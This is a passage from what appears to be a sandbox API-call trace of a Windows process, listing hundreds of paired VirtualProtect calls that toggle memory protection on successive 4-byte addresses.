dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.750] VirtualProtect (in: lpAddress=0x24e15c8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.750] VirtualProtect (in: lpAddress=0x24e15d0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.750] VirtualProtect (in: lpAddress=0x24e15d0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.751] VirtualProtect (in: lpAddress=0x24e15d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.751] VirtualProtect (in: lpAddress=0x24e15d8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.751] VirtualProtect (in: lpAddress=0x24e15e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.751] VirtualProtect (in: lpAddress=0x24e15e0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.751] VirtualProtect (in: lpAddress=0x24e15e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.751] VirtualProtect (in: lpAddress=0x24e15e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.751] VirtualProtect (in: lpAddress=0x24e15f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.752] VirtualProtect (in: lpAddress=0x24e15f0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.752] VirtualProtect (in: lpAddress=0x24e15f8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.752] VirtualProtect (in: lpAddress=0x24e15f8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.752] VirtualProtect (in: lpAddress=0x24e1600, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.752] VirtualProtect (in: lpAddress=0x24e1600, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.752] VirtualProtect (in: lpAddress=0x24e1608, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.752] VirtualProtect (in: lpAddress=0x24e1608, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.753] VirtualProtect (in: lpAddress=0x24e1610, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.753] VirtualProtect (in: lpAddress=0x24e1610, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.753] VirtualProtect (in: lpAddress=0x24e1618, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.753] VirtualProtect (in: lpAddress=0x24e1618, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.753] VirtualProtect (in: lpAddress=0x24e1620, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.753] VirtualProtect (in: lpAddress=0x24e1620, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.753] VirtualProtect (in: lpAddress=0x24e1628, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.754] VirtualProtect (in: lpAddress=0x24e1628, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.754] VirtualProtect (in: lpAddress=0x24e1630, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.754] VirtualProtect (in: lpAddress=0x24e1630, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.754] VirtualProtect (in: lpAddress=0x24e1634, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.754] VirtualProtect (in: lpAddress=0x24e1634, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.754] VirtualProtect (in: lpAddress=0x24e1638, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.754] VirtualProtect (in: lpAddress=0x24e1638, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.754] VirtualProtect (in: lpAddress=0x24e1640, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.755] VirtualProtect (in: lpAddress=0x24e1640, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.755] VirtualProtect (in: lpAddress=0x24e1654, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.755] VirtualProtect (in: lpAddress=0x24e1654, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.755] VirtualProtect (in: lpAddress=0x24e1660, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.755] VirtualProtect (in: lpAddress=0x24e1660, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.755] VirtualProtect (in: lpAddress=0x24e166c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.756] VirtualProtect (in: lpAddress=0x24e166c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.756] VirtualProtect (in: lpAddress=0x24e1678, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.756] VirtualProtect (in: lpAddress=0x24e1678, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.756] VirtualProtect (in: lpAddress=0x24e1684, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.756] VirtualProtect (in: lpAddress=0x24e1684, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.756] VirtualProtect (in: lpAddress=0x24e168c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.756] VirtualProtect (in: lpAddress=0x24e168c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.757] VirtualProtect (in: lpAddress=0x24e1694, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.757] VirtualProtect (in: lpAddress=0x24e1694, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.757] VirtualProtect (in: lpAddress=0x24e169c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.757] VirtualProtect (in: lpAddress=0x24e169c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.757] VirtualProtect (in: lpAddress=0x24e16a4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.757] VirtualProtect (in: lpAddress=0x24e16a4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.757] VirtualProtect (in: lpAddress=0x24e16e4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.758] VirtualProtect (in: lpAddress=0x24e16e4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.758] VirtualProtect (in: lpAddress=0x24e16e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.758] VirtualProtect (in: lpAddress=0x24e16e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.758] VirtualProtect (in: lpAddress=0x24e16f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.758] VirtualProtect (in: lpAddress=0x24e16f0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.758] VirtualProtect (in: lpAddress=0x24e16f8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.758] VirtualProtect (in: lpAddress=0x24e16f8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.759] VirtualProtect (in: lpAddress=0x24e1744, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.759] VirtualProtect (in: lpAddress=0x24e1744, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.759] VirtualProtect (in: lpAddress=0x24e174c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.759] VirtualProtect (in: lpAddress=0x24e174c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.759] VirtualProtect (in: lpAddress=0x24e1750, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.759] VirtualProtect (in: lpAddress=0x24e1750, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.759] VirtualProtect (in: lpAddress=0x24e1758, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.760] VirtualProtect (in: lpAddress=0x24e1758, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.760] VirtualProtect (in: lpAddress=0x24e1760, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.760] VirtualProtect (in: lpAddress=0x24e1760, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.760] VirtualProtect (in: lpAddress=0x24e1768, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.760] VirtualProtect (in: lpAddress=0x24e1768, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.760] VirtualProtect (in: lpAddress=0x24e1770, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.761] VirtualProtect (in: lpAddress=0x24e1770, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.762] VirtualProtect (in: lpAddress=0x24e1780, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.762] VirtualProtect (in: lpAddress=0x24e1780, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.762] VirtualProtect (in: lpAddress=0x24e1784, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.762] VirtualProtect (in: lpAddress=0x24e1784, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.763] VirtualProtect (in: lpAddress=0x24e1788, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.763] VirtualProtect (in: lpAddress=0x24e1788, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.763] VirtualProtect (in: lpAddress=0x24e178c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.763] VirtualProtect (in: lpAddress=0x24e178c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.763] VirtualProtect (in: lpAddress=0x24e1790, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.763] VirtualProtect (in: lpAddress=0x24e1790, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.763] VirtualProtect (in: lpAddress=0x24e1794, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.764] VirtualProtect (in: lpAddress=0x24e1794, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.764] VirtualProtect (in: lpAddress=0x24e17a0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.764] VirtualProtect (in: lpAddress=0x24e17a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.764] VirtualProtect (in: lpAddress=0x24e17a4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.764] VirtualProtect (in: lpAddress=0x24e17a4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.764] VirtualProtect (in: lpAddress=0x24e17a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.764] VirtualProtect (in: lpAddress=0x24e17a8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.765] VirtualProtect (in: lpAddress=0x24e17ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.765] VirtualProtect (in: lpAddress=0x24e17ac, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.765] VirtualProtect (in: lpAddress=0x24e17b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.765] VirtualProtect (in: lpAddress=0x24e17b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.765] VirtualProtect (in: lpAddress=0x24e17c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.765] VirtualProtect (in: lpAddress=0x24e17c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.765] VirtualProtect (in: lpAddress=0x24e17c4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.766] VirtualProtect (in: lpAddress=0x24e17c4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.766] VirtualProtect (in: lpAddress=0x24e17c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.766] VirtualProtect (in: lpAddress=0x24e17c8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.766] VirtualProtect (in: lpAddress=0x24e17cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.766] VirtualProtect (in: lpAddress=0x24e17cc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.766] VirtualProtect (in: lpAddress=0x24e17d4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.766] VirtualProtect (in: lpAddress=0x24e17d4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.767] VirtualProtect (in: lpAddress=0x24e17d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.767] VirtualProtect (in: lpAddress=0x24e17d8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.767] VirtualProtect (in: lpAddress=0x24e17dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.767] VirtualProtect (in: lpAddress=0x24e17dc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.767] VirtualProtect (in: lpAddress=0x24e17e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.767] VirtualProtect (in: lpAddress=0x24e17e0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.767] VirtualProtect (in: lpAddress=0x24e17e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.768] VirtualProtect (in: lpAddress=0x24e17e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.768] VirtualProtect (in: lpAddress=0x24e17ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.768] VirtualProtect (in: lpAddress=0x24e17ec, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.768] VirtualProtect (in: lpAddress=0x24e17f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.768] VirtualProtect (in: lpAddress=0x24e17f0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.768] VirtualProtect (in: lpAddress=0x24e17f4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.769] VirtualProtect (in: lpAddress=0x24e17f4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.769] VirtualProtect (in: lpAddress=0x24e1800, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.769] VirtualProtect (in: lpAddress=0x24e1800, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.769] VirtualProtect (in: lpAddress=0x24e1808, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.769] VirtualProtect (in: lpAddress=0x24e1808, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.769] VirtualProtect (in: lpAddress=0x24e180c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.769] VirtualProtect (in: lpAddress=0x24e180c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.769] VirtualProtect (in: lpAddress=0x24e1810, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.770] VirtualProtect (in: lpAddress=0x24e1810, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.770] VirtualProtect (in: lpAddress=0x24e1814, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.770] VirtualProtect (in: lpAddress=0x24e1814, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.770] VirtualProtect (in: lpAddress=0x24e1818, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.770] VirtualProtect (in: lpAddress=0x24e1818, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.770] VirtualProtect (in: lpAddress=0x24e1828, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.770] VirtualProtect (in: lpAddress=0x24e1828, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.771] VirtualProtect (in: lpAddress=0x24e182c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.771] VirtualProtect (in: lpAddress=0x24e182c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.771] VirtualProtect (in: lpAddress=0x24e1830, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.771] VirtualProtect (in: lpAddress=0x24e1830, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.771] VirtualProtect (in: lpAddress=0x24e1840, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.771] VirtualProtect (in: lpAddress=0x24e1840, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.771] VirtualProtect (in: lpAddress=0x24e1844, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.772] VirtualProtect (in: lpAddress=0x24e1844, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.772] VirtualProtect (in: lpAddress=0x24e1848, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.772] VirtualProtect (in: lpAddress=0x24e1848, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.772] VirtualProtect (in: lpAddress=0x24e184c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.772] VirtualProtect (in: lpAddress=0x24e184c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.772] VirtualProtect (in: lpAddress=0x24e1850, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.773] VirtualProtect (in: lpAddress=0x24e1850, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.773] VirtualProtect (in: lpAddress=0x24e1854, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.773] VirtualProtect (in: lpAddress=0x24e1854, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.773] VirtualProtect (in: lpAddress=0x24e1860, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.773] VirtualProtect (in: lpAddress=0x24e1860, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.773] VirtualProtect (in: lpAddress=0x24e1864, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.773] VirtualProtect (in: lpAddress=0x24e1864, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.773] VirtualProtect (in: lpAddress=0x24e1868, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.774] VirtualProtect (in: lpAddress=0x24e1868, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) 